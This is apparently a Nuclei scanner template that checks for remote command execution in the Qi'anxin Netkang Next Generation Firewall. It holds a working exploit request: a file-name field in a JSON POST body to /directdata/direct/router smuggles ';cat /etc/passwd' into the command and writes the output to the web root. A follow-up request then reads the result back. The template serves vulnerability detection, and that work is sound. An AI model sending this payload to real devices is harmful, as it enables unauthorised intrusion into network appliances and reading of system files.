id: qi-anxin-netkang-next-generation-firewall-rce

info:
  name: Qi'anxin Netkang Next Generation Firewall RCE
  author: pikpikcu
  severity: critical
  reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  tags: rce

requests:
  - raw:
      - |
        POST /directdata/direct/router HTTP/1.1
        Host: {{Hostname}}

        {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

      - |
        GET /poc.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
        part: body

      - type: status
        status:
          - 200
